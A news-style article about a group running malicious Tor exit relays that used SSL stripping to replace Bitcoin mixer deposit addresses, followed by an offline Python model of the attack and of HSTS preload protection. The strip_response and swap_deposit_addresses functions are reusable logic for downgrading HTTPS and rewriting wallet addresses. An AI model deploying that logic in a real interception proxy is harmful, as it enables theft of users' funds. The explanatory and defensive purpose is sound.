Hackers Hijacking Bitcoins through SSL Stripping
The Tor browser is meant to let people browse the internet without being tracked. To keep a user's connection private, the Tor network relays the traffic through a chain of volunteer-run servers (nodes) before it reaches its destination, so that no single node sees both who the user is and where the traffic is going. This makes connections slower, but considerably more private than browsing the open internet the way most of us do every day. A hacker group, however, has been hijacking the network by adding malicious servers of its own and intercepting the traffic that passes through them for profit.

As reported by Nusenu, a security researcher and Tor relay operator, the group ran over 380 Tor exit relays in May. An exit relay is the final hop of the Tor network, where a user's traffic leaves the anonymous network and reaches its destination on the surface internet. Because the exit relay sees the traffic in whatever form the user sent it, a malicious exit operator can read and alter anything that is not protected end to end by TLS.

The group is described as performing SSL stripping: it downgrades users' secure HTTPS connections to plain HTTP so it can read and modify the traffic at will. SSL stripping only works when the browser's first request to a site goes out over plain HTTP (for example, because the user typed the address without https:// or followed an http:// link). The malicious exit fetches the real page over HTTPS itself, then serves it back to the user over HTTP, rewriting every https:// link so that every later request is plaintext as well. Sites whose domains are on the HSTS preload list are not affected, since the browser upgrades the request to HTTPS before it ever leaves the client.

Here the group was found to be intercepting traffic to cryptocurrency-related websites, mostly Bitcoin mixing services, in order to replace the destination address. A Bitcoin mixing service takes funds sent to a specific address, splits them into several small payments, and routes them through various intermediary addresses to the final wallet, where the parts are rejoined. This makes the payments and their recipient harder to trace. The group intercepts the mixer's pages and substitutes its own wallet address for the mixer's, so that the victim's funds go to the attacker instead. Since the user is shown a page that looks exactly like the real one, the only visible clue is the missing padlock in the address bar.

At its peak the group operated over 380 relays, which amounted to 23.95% of the network's exit capacity. Though the Tor Project removed some of these relays, the group still controlled over 10% of the exit capacity at the time of writing, according to the researcher.
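The attack described above, modelled offline as an added example (this is not code from the report or from the attackers): a malicious exit relay receives a plaintext HTTP request, fetches the mixer's real page over HTTPS on the victim's behalf, strips the HTTPS links and the HSTS header, and swaps the deposit addresses for its own. The defensive half shows why HSTS preloading defeats it: a browser that knows the host is preloaded never sends the plaintext request the relay needs. The mixer host name, its page, the preload entry and both attacker addresses are constructed placeholders; the two mixer addresses are the well-known BIP-173 and Wikipedia example addresses, not real wallets.

```python
import re
from typing import Dict, FrozenSet, Optional, Tuple

# Constructed origin: what the real mixer would serve over HTTPS.
ORIGIN_PAGES: Dict[str, Tuple[Dict[str, str], str]] = {
    "https://mixer.example/": (
        {"Content-Type": "text/html",
         "Strict-Transport-Security": "max-age=31536000"},
        "<html><body>\n"
        "<p>Send 0.5 BTC to <b>1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2</b></p>\n"
        "<p>or to bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq</p>\n"
        '<a href="https://mixer.example/status">Check status</a>\n'
        "</body></html>\n",
    ),
}

# Constructed attacker addresses (placeholders, not real wallets).
ATTACKER_P2PKH = "1AttackerAddrPlaceholderXXXXXXXXXX"
ATTACKER_BECH32 = "bc1qattackeraddrplaceholderxxxxxxxxxxxx"

HTTPS_URL = re.compile(r"https://", re.IGNORECASE)
# Legacy base58 addresses start with 1 (P2PKH) or 3 (P2SH); native segwit with bc1.
BASE58_ADDR = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
BECH32_ADDR = re.compile(r"\bbc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71}\b")


def strip_response(headers: Dict[str, str], body: str) -> Tuple[Dict[str, str], str]:
    """sslstrip-style rewrite applied by the malicious exit:
    - every https:// link or form target becomes http://, so the browser's
      next request is plaintext and reaches the relay in the clear again;
    - Strict-Transport-Security is dropped so the browser never learns to
      insist on HTTPS for this host;
    - an https:// redirect in Location is downgraded the same way."""
    out = {k: v for k, v in headers.items()
           if k.lower() != "strict-transport-security"}
    if "Location" in out:
        out["Location"] = HTTPS_URL.sub("http://", out["Location"])
    return out, HTTPS_URL.sub("http://", body)


def swap_deposit_addresses(body: str) -> str:
    """Replace every Bitcoin address in the page with the attacker's."""
    body = BASE58_ADDR.sub(ATTACKER_P2PKH, body)
    return BECH32_ADDR.sub(ATTACKER_BECH32, body)


def malicious_exit(request_url: str) -> Optional[Tuple[Dict[str, str], str]]:
    """Model of the relay. The client sent request_url; return the (headers,
    body) the victim receives, or None when the request was HTTPS and the
    relay saw only ciphertext it could not tamper with."""
    if request_url.startswith("https://"):
        return None
    # The relay fetches the real page over HTTPS itself (simulated lookup).
    upstream = "https://" + request_url[len("http://"):]
    headers, body = ORIGIN_PAGES[upstream]
    headers, body = strip_response(headers, body)
    return headers, swap_deposit_addresses(body)


# Constructed preload entry; real browsers ship Chromium's HSTS preload list.
HSTS_PRELOAD: FrozenSet[str] = frozenset({"mixer.example"})


def browser_request(typed_url: str,
                    preload: FrozenSet[str] = HSTS_PRELOAD) -> str:
    """What actually leaves the client. A bare host name defaults to http://,
    which is exactly the request a stripping exit wants to see; a host on
    the preload list (or with a cached HSTS policy) is upgraded to https://
    before the request is sent, so the exit never gets a plaintext request."""
    if "://" not in typed_url:
        typed_url = "http://" + typed_url
    host = typed_url.split("//", 1)[1].split("/", 1)[0]
    if typed_url.startswith("http://") and host in preload:
        return "https://" + typed_url[len("http://"):]
    return typed_url
```

Running `malicious_exit(browser_request("mixer.example/"))` returns None because the preload entry forces the request to HTTPS; dropping the host from the preload set yields a page with no https:// links, no HSTS header, and the attacker's addresses in place of the mixer's, which is the page a victim on the exit relays described above would have seen.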